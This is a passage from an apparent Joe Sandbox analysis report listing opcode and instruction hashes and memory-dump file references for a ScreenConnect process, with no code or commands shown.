                                                                                                                                                                                • Opcode Fuzzy Hash: f2fcdd9ee7220be8ba79addd5f041f57368fdf1a0a97886af5744a12dfd75628
                                                                                                                                                                                • Instruction Fuzzy Hash: EFF04970D14248EFCB49EFA8D996A9CBFF0FF05340F1440AAC515EB261DB346A89CB42
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5fd8f20c4001498961f03b7f65a0f7cc13d1359d524de1dabb7c4b54a31d8aa3
                                                                                                                                                                                • Instruction ID: 2f55eeea748e6694138f9ebdae7f01d4e7a40f46e856cdb1bea4d1458fb3a17c
                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd8f20c4001498961f03b7f65a0f7cc13d1359d524de1dabb7c4b54a31d8aa3
                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0CD3090A2849FCB52CF78DC8A9D9BFB0AF06201B0980DBD849DB322E2345A05CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cc71471d8a9927b91ceee1c3c9fc93efe208f34cc2cec6b3c1b2e66df20c20d9
                                                                                                                                                                                • Instruction ID: c39c497fee64af2298b44ff3fd4ffc318752c39ec20696cfb96a77662441a386
                                                                                                                                                                                • Opcode Fuzzy Hash: cc71471d8a9927b91ceee1c3c9fc93efe208f34cc2cec6b3c1b2e66df20c20d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 4CF0BE74A062099FC708CB68CD95A5DBBB5EF82304F14C0AAED00CB292DB31AD21C790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1ba4434bf0ac4dd186d3e1b66cbc3a6a039cbfc15c81e784f3db9ed27ccf670a
                                                                                                                                                                                • Instruction ID: 6446eb070ec20c25e420d3219b03d3f7e17e8274ef02f312512fa67d75cdea62
                                                                                                                                                                                • Opcode Fuzzy Hash: 1ba4434bf0ac4dd186d3e1b66cbc3a6a039cbfc15c81e784f3db9ed27ccf670a
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F0F6725082504FC31AC7BCF851A9D3FE0EE8225074905EBD441CF1A6C758B909D352
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fb048ed04843670529af5b63f011742292348129f445dad009efd7b6c435727b
                                                                                                                                                                                • Instruction ID: 87cf47c7c5624d9b23946eec9f2d902a3dff82570111e523bd2a2830325f7ae1
                                                                                                                                                                                • Opcode Fuzzy Hash: fb048ed04843670529af5b63f011742292348129f445dad009efd7b6c435727b
                                                                                                                                                                                • Instruction Fuzzy Hash: DFF0E533A0D3545FC725CB7A980199B7FE9CF86214709C0BFD44DC3691D9389402C725
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 497da083f7d324be6c4a8cac7d2ea558b57ff90dd6c3f6751b99e94b4664ead9
                                                                                                                                                                                • Instruction ID: 5a2e1a0d5de8d1aa3d19e6fe77a5d0edd38ad002a977752d81c31e7e3627e0e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 497da083f7d324be6c4a8cac7d2ea558b57ff90dd6c3f6751b99e94b4664ead9
                                                                                                                                                                                • Instruction Fuzzy Hash: E3F06D70D8020EDFDF08DF98EA5476E7FB8FB44314F008C66D21097248CB7425558B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f708631ad731b248d5f962e9e840a67884de630d05d5f158c321c7f76ad32a0e
                                                                                                                                                                                • Instruction ID: 187d88aa1711ebdcaff1c9f175685250ec77b0387599d033fcbcaf24642bc910
                                                                                                                                                                                • Opcode Fuzzy Hash: f708631ad731b248d5f962e9e840a67884de630d05d5f158c321c7f76ad32a0e
                                                                                                                                                                                • Instruction Fuzzy Hash: FDF0E274E0020CEFCB08EFE8D995AACBBF5FB44244F1040A9D505A7254EB306E84CB42
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ba4d1965509cf29b064a7cbec3f5377f2936d9b9e7796fb7bed5bde21ad5f912
                                                                                                                                                                                • Instruction ID: e3dea148cf552290acc9f49eb4780035f34b596de0e02cb8c2769d7dc9971d90
                                                                                                                                                                                • Opcode Fuzzy Hash: ba4d1965509cf29b064a7cbec3f5377f2936d9b9e7796fb7bed5bde21ad5f912
                                                                                                                                                                                • Instruction Fuzzy Hash: CFF01730B001158FD719DB6DC554AAEBBE1EF887517048069E809CB264EB34DD11CB81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9f29d7ad88a2a7940198e2df728c3f193b902065ea1da4c34f23f4b423efe5f8
                                                                                                                                                                                • Instruction ID: 6c280fb1772447864ac3ae2cad2548fd6eeefc15f2316b737bd191586d0013c2
                                                                                                                                                                                • Opcode Fuzzy Hash: 9f29d7ad88a2a7940198e2df728c3f193b902065ea1da4c34f23f4b423efe5f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FE065357042096F4B09DA4ED400D9BBBEADFC8221714C026F909CB315DB31DD0287A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 296db105000304a4b3d7e7c379d1f5cbb582bdb2b89bbf4092b93ab29ee16a63
                                                                                                                                                                                • Instruction ID: 7a832e4f06382b0da65b3e1e4b0b758841559f1eb554401584b34fb8703a2f19
                                                                                                                                                                                • Opcode Fuzzy Hash: 296db105000304a4b3d7e7c379d1f5cbb582bdb2b89bbf4092b93ab29ee16a63
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF06D70D8424ADFDF05EFA8E969B6EBF78FB45300F008C6AD5109B299CB782545CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8463550dfd2672efb4940b4adc3741b3ac6eb0dd5e9c00b1ead7295835befd46
                                                                                                                                                                                • Instruction ID: 85adcdafbaa246dcac47778d8bb6a4590280e8cb9fca32e1091abd4021c93885
                                                                                                                                                                                • Opcode Fuzzy Hash: 8463550dfd2672efb4940b4adc3741b3ac6eb0dd5e9c00b1ead7295835befd46
                                                                                                                                                                                • Instruction Fuzzy Hash: 12F090313046044BE714DAB8F58591DB7E9DF802A07148A6BD8158B295DB72E9058781
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: aa09c99327da108c993cf314106cf8bc01f995d6fe18e0fbbc6cf74c7085bdbc
                                                                                                                                                                                • Instruction ID: 8f079def0b12f4c384f9db49a1faf65372614f5cb1626df074b02dd05c68b4a2
                                                                                                                                                                                • Opcode Fuzzy Hash: aa09c99327da108c993cf314106cf8bc01f995d6fe18e0fbbc6cf74c7085bdbc
                                                                                                                                                                                • Instruction Fuzzy Hash: 40F0A7353052185FC711ABB8E858C9D3BA6DBC926131441B7D826CB3C5CF309806C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7c5516fd415d6b1a2d151f6a649437b8ac955fa36b82a94702682ab049617f65
                                                                                                                                                                                • Instruction ID: 8877aa69ce343ab56edf208bb8a4aba7af7f57855de1b4cf9792d62694a9400b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c5516fd415d6b1a2d151f6a649437b8ac955fa36b82a94702682ab049617f65
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0A7316092004BC709A778E951A9E3BE5DEC171171489FFE145CB291DF769C09C7D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f96e6ad62f3815f80032e9e9b545643047475941f702457df8f9ef6b3acb749
                                                                                                                                                                                • Instruction ID: c60b4c92837eff34ce2632b0f9ab54b2dd11990b17ac5ebe0245488de1ebc7e2
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f96e6ad62f3815f80032e9e9b545643047475941f702457df8f9ef6b3acb749
                                                                                                                                                                                • Instruction Fuzzy Hash: ACF0D471E00219DF8B44DFADC84169EFBF5EF49200B24C06AD918EB210E331AA12CFC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e9a58b3cf3dba45a6ca7315c8ce45248cf9385495ee201cb6c795da9a1d4c300
                                                                                                                                                                                • Instruction ID: 0725fb21b761bbe9897790d876b0011a5ebac9aa2969be073cf119d7dfd76294
                                                                                                                                                                                • Opcode Fuzzy Hash: e9a58b3cf3dba45a6ca7315c8ce45248cf9385495ee201cb6c795da9a1d4c300
                                                                                                                                                                                • Instruction Fuzzy Hash: 92E086363143145B87186BAF7498A6EBBDBEBCCA61B54443EF70AC7340CE728C098795
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f5c8ed36394adfdd7d79643d32628003ae433ca9447536104426f25049ca9fc5
                                                                                                                                                                                • Instruction ID: b84631e7e2bfc7261e45e5dfc99c3bd5ec2977e7adb6d66e522189b2546e1748
                                                                                                                                                                                • Opcode Fuzzy Hash: f5c8ed36394adfdd7d79643d32628003ae433ca9447536104426f25049ca9fc5
                                                                                                                                                                                • Instruction Fuzzy Hash: 45E0E5B16082046FC7099BACD8616AD7FE49F47320F0444EBD48CD7252DE3A99058791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4a258e9e2bb23b7c4d3cb22b2c1bd4a67d05eaa774b92c476faae59cc673b412
                                                                                                                                                                                • Instruction ID: a2e811f09192c7c56b0f1485139fa5dbbaa08be24ca2bf16feb6c3a255aadb9a
                                                                                                                                                                                • Opcode Fuzzy Hash: 4a258e9e2bb23b7c4d3cb22b2c1bd4a67d05eaa774b92c476faae59cc673b412
                                                                                                                                                                                • Instruction Fuzzy Hash: 48F08C30A4A289AFC702DB7CED609EC7FB5EF8220470905EBC444CB2A6CA305E18D791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: da8f78a052a03866629da294af80aaf1f7f03691ebf2e1cc6d986c118ca5fa7d
                                                                                                                                                                                • Instruction ID: 4a15a1a0e49a7dec50c1be81a4acb5cb785dd015e75511fd830a1b799af4c755
                                                                                                                                                                                • Opcode Fuzzy Hash: da8f78a052a03866629da294af80aaf1f7f03691ebf2e1cc6d986c118ca5fa7d
                                                                                                                                                                                • Instruction Fuzzy Hash: E7E0923160420057C708A779E915A9E36D9DEC575070485BBE20A8B351DF62AC09C7D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 940ccd0e45c05f1489f1d1bf8aff7e8e0a8d8b8e1b9c96b4d0c6aef67d36b03f
                                                                                                                                                                                • Instruction ID: 2544008f6dcc0cff08dc7c5645118bed0fe8635c9e5a91024a0d48982f95c82a
                                                                                                                                                                                • Opcode Fuzzy Hash: 940ccd0e45c05f1489f1d1bf8aff7e8e0a8d8b8e1b9c96b4d0c6aef67d36b03f
                                                                                                                                                                                • Instruction Fuzzy Hash: 90E086327412055BC318952AE890957B3FEEBC9765F104479E50CD7355CEB29C868690
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ab383d939331afd0da81712785bfdd778c9cbf312ad984ec3cc4e5808d7bd7bd
                                                                                                                                                                                • Instruction ID: f582e6beef4724a67a159d6d75240ac7a676562310ff219389832234a60166bd
                                                                                                                                                                                • Opcode Fuzzy Hash: ab383d939331afd0da81712785bfdd778c9cbf312ad984ec3cc4e5808d7bd7bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 15E0DF32B452001BC318962AA8909AAB7BAEBC8724B20047DE10DD7356CAB288868A40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5cbfbf6e792d1d9f5f1508be89cb6caa953690cfb443b555dc8852f4b249f75f
                                                                                                                                                                                • Instruction ID: e3357440c952a5c4aaf5debaf2b3e4f414da4f4f640fc64f5a439d6a9bd54d6c
                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbfbf6e792d1d9f5f1508be89cb6caa953690cfb443b555dc8852f4b249f75f
                                                                                                                                                                                • Instruction Fuzzy Hash: 16E092343003048FC314DB19C544D16BBEAEFC9714B1984ADE5498B361CBB1FC41CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cd58a054e9a134002ac0a0d9696b93b407022a31e668d5817c20910f1029e30c
                                                                                                                                                                                • Instruction ID: 66ab0f6bd9d2ec2b48e391ddf1982a9a7dae6c0e700bce02efb139479200a5ed
                                                                                                                                                                                • Opcode Fuzzy Hash: cd58a054e9a134002ac0a0d9696b93b407022a31e668d5817c20910f1029e30c
                                                                                                                                                                                • Instruction Fuzzy Hash: C4E01576D001259F8B40EFA8D84159DBBB0EB48200B10856AD528EB221E2328A029FC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7b9419ba34bdf53b9d4a8e8baa894ae978f7b73fe1102ce70aec756a75429dad
                                                                                                                                                                                • Instruction ID: b3e7b953abad0d617305c3743ec99139aaeeb6204f19845432f848c9d4d8f57e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b9419ba34bdf53b9d4a8e8baa894ae978f7b73fe1102ce70aec756a75429dad
                                                                                                                                                                                • Instruction Fuzzy Hash: 72E04F30956248EFCB04DFB8E942A5C7FF9EF4561270085EAD405D7325DA305E659B41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 81f316283434e312d9e126b9cba6ef11399a5a5ba9f98db1540e7d10d097ea97
                                                                                                                                                                                • Instruction ID: 6ee7b0d5ac585b45298d24f135eb6180feba60abfcbe30145652afb117b7bb03
                                                                                                                                                                                • Opcode Fuzzy Hash: 81f316283434e312d9e126b9cba6ef11399a5a5ba9f98db1540e7d10d097ea97
                                                                                                                                                                                • Instruction Fuzzy Hash: 96E08C3A30521C5B8304BAFDE408C6E7BDAEBC96613144566E93ACB388CF309C02C7A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7bf22f92c429c0835d42555c8bb77c11613f5520161b50d06c29a81f1adf186e
                                                                                                                                                                                • Instruction ID: 9a3cb4cfdd0d0820c99aa410b814a8b5e4dd97c832f839afefa348b9db374fa4
                                                                                                                                                                                • Opcode Fuzzy Hash: 7bf22f92c429c0835d42555c8bb77c11613f5520161b50d06c29a81f1adf186e
                                                                                                                                                                                • Instruction Fuzzy Hash: 30E092312086554FC71ADBBCF841A9D3BE5EF82310B0849AED5418B196CBA4B949C7D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4cef2b51cd1ecaa656cab3b949bfb80f861279e2e697f7468671b5c2adb3f77d
                                                                                                                                                                                • Instruction ID: 56d0d42d4fd68e167b9801043d3bfdbeb19a94e9c655c6d21ff53d55cf27d366
                                                                                                                                                                                • Opcode Fuzzy Hash: 4cef2b51cd1ecaa656cab3b949bfb80f861279e2e697f7468671b5c2adb3f77d
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FE09231D481889FC704DFB8E941D4D7BF4DF4A200B0148EAC804CB262EB356A04DB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                                                                                                                • Instruction ID: 8536715d4ac1f93618722a3b7221a442757d1ba49f889e8636312060ac1b950e
                                                                                                                                                                                • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                                                                                                                • Instruction Fuzzy Hash: 72E0B671D002299F8B80EFADD9015AEFBF4EF49210B11856AD91CE7201E3329B128FC1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d3efb3a3cd48e5d9207bd86521da86e941383a804ce683ec1efe7e2cc3ef0446
                                                                                                                                                                                • Instruction ID: 47d9f7fa39bbd43165ecbb865280c1c62a938df0a83697bcf608438bf4cc01b0
                                                                                                                                                                                • Opcode Fuzzy Hash: d3efb3a3cd48e5d9207bd86521da86e941383a804ce683ec1efe7e2cc3ef0446
                                                                                                                                                                                • Instruction Fuzzy Hash: 54D0A7054483C50FEB1127B548517F53FDC4F46A04F4D04D6E0C4C715BD918E08B5231
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bacff39b275acba1932600c3c529ddeb0ac07b04d726ae5231219acc007a86d2
                                                                                                                                                                                • Instruction ID: 4c5b8aea9a1a15fcc8d6d71027884cc5d8705ddc970e1a6f4378913642d11a70
                                                                                                                                                                                • Opcode Fuzzy Hash: bacff39b275acba1932600c3c529ddeb0ac07b04d726ae5231219acc007a86d2
                                                                                                                                                                                • Instruction Fuzzy Hash: 31E04F7051D3809FC741DF389D14549BFF0AE06200B4684AFD8C9C7651E634A84AC762
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                • Instruction ID: 2fc6dc1aebb5041c387f502a2819851d65969308fb056af5560a02d0354e21b9
                                                                                                                                                                                • Opcode Fuzzy Hash: 367a1b826ea3db369d27ca75234e0ad34619fd40c18b8bc831881e70ef4a2995
                                                                                                                                                                                • Instruction Fuzzy Hash: 74E0EC71E10219DF8B80EFBDD80559EBBF8EF09651B1144A6D91DE7311E3309A10CBD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
